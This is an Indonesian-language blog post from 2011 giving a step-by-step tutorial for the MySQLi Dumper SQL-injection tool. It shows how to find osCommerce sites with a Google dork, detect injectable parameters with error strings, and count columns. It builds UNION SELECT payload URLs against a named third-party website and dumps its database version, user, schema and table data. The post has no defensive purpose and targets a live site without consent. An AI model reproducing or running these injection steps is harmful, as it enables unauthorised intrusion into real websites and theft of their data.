Minggu, 11 Desember 2011

mysqli dumper tool

Diposting oleh K4C3 Undetected di 15.11 | Minggu, 11 Desember 2011 | 0 komentar
Label:

MySQLi Dumper adalah tool yang digunakan untuk me-dump database MySQL
menggunakan teknik SQL Injection. MySQLi dumper dapat memunculkan semua
data Database, tabel, kolom dan data.Tool ini juga mempunyai banyak
fitur yang menarik lainnya.
Berikut screensortnya:


1.Bagian scanner.(untuk mencari target)
Untuk mencari target,
masukkan dork di textbox di bawah tab Scanner, kita juga bisa memilih
search Engine yang kita inginkan, kita bisa menggantinya, klik saja box
yang ada disamping texbox untuk dork.
Kali ini kita mencoba menggunakan google.
Dengan dork “customer_testimonials.php?testimonial_id=”
Nah, untuk mengatur jumlah page yang akan diload untuk mencari target,kita bisa mengaturnya pada “Search Pages (Approx):
Jika pengaturan sudah selesai, sekarang waktunya mencari target, kita tinggal klik tombol “Start Scann Link”
Beberapa
saat kemudian, tunggu sampai proses selesai, targetpun akan muncul,
belum apa apa saja, saya sudah mendapat 477 target, itu pun saya tidak
menunggu sampain proses scanning selesai.
2.Untuk menscan target yang vuln SQLi , kita masuk ke tab “Vuln. SQL” lalu kita klik tombol “Start cann SQLi”
Tapi
tunggu dulu, pada bagian “Spy word to check source
SQL…bla..bla…bla” kita bisa menambahkan kata lain agar target yang
didapat lebih memuaskan.
saya menabahkan kata lain sehingga menjadi:
sql
syntax;sql erro;right syntax to use near;Warning: mysql_num_rows();You
have an error in your SQL syntax;Warning: mysql_fetch_row(): supplied
argument is not a valid MySQL result resource in;
Kita juga bisa mengganti SQLi-Inject Code dengan ‘ (quote)
Sekarang kitamulai scan.
Tunggu sampai proses selesai.
Nah, targetnya sudah kelihatan, saya mendapat 3 target yangvuln SQLi.
Sekarang waktunya kita scan jumlah kolom yang ada di web tersebut, misal target saya adalah
“http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3″
3.Untuk mencari jumlah kolom, masuk ke tab “Num.Blind”
Sekarang masukkan target ke textbox paling atas, namun sebelumnya tambahkan – setelah =
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3
Sekarang kita klik “Get Page”
Nah, keluar “The used SELECT statements have a different number of columns”
Berarti
jumlah kolomnya salah, karena ini bug osCommerce maka kemungkinan
jumlah kolomya diatas 7, jadi kita ganti angka 2 pada box di samping
tombol “Get Page” dengan angka 7.
Ternyata error sama “1222 – The used SELECT statements have a different number of columns”
Kita coba angka 8, w00t w00t…error tidak terlihat dan keluar angka 3,4,dan 6.
Sekarang kita copy url pada text box disamping tombol “Get Page Manually”
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8–
lalu kita gantikan angka yang keluar dengan [t]
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8–
4.Sekarang kita masuk ke tab Dump MySQL.
Pada bagian inilah yang seru, kita bisa melihat database, table, column, serta data yang ada di column tersebut.
Copy url tadi ke textbox yang paling atas
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8–
Pada
bagian setup kita bisa mengatur jumlah data yang dapat kita ambil, Kita
atur saja pada bagian “Max. Pages”, kali ini saya membatasi 5000 page
yang akan di load.
Jika sudah diatur, sekarang klik “Get Info” untuk mengetahui versi database version, server, dan user()
Nah, disitu sudah terpampang:
Version():5.0.67.d7-ourdelta-log
Server:Apache
User():OSC_Test5_0@64.202.163.143
Karena Version(): 5, maka kita dapat melihat nama database, table, column, serta data yang ada di web tersebut dengan mudah.
Sekarang klik “Get Data Base” beberapa saat kemudian, nama database yang ada di situs tersebutpun akan muncul,
Nah terlihat bahwa ada 2 database:
1.information_schema
2.OSC_Test5_0
Kita
pilih OSC_Test5_0, kenapa bukan information_schema ?? karena tdatabase
ini bukan database yang digunakan oleh cms pada web tersebut, yaitu
osCommerce
Lalu klik “Get Tables”
Daftar table sudah muncul (hanya sedikit karena saya tidak menunggu sampai proses selesai)
Misalkan kita memilih table “banner”, kita tinggal klik table tersebut lalu klik tombol “Get Columns”
Daftar column sudah ada:
Columnnya:
banners_group
banners_html_text
banners_id
banners_image
banners_title
banners_url
date_added
date_scheduled
date_status_change
expires_date
expires_impressions
status
Sekarang
kita blok column yang ingin kita dump datanya, gunakan ctrl sembari
mengklik column yang diinginkan, jika ingin me-dump lebih dari 1 kolom.
Jika sudah memilih, klik “Dump data (Selected Columns)”
Nah, proses dump berhasil:
banners_id banners_url status
1 http://www.oscommerce.com 0
Dengan keterangan:
banners_id= 1
banners_url= http://www.oscommerce.com
status= 0
Sekian dulu tutorial kali ini.Untuk MySQLi Dumper untuk version():4 akan dibahas lain waktu.
Link Download
Download .net framework

0 komentar:

:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Posting Komentar

Langganan: Posting Komentar (Atom)
 
© Copyright 2010. yourblogname.com . All rights reserved | yourblogname.com is proudly powered by Blogger.com | Template by o-om.com - zoomtemplate.com